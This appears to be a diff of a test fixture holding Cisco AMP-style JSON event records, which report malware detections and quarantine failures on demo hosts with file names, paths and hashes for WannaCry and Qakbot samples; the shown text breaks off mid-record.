-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
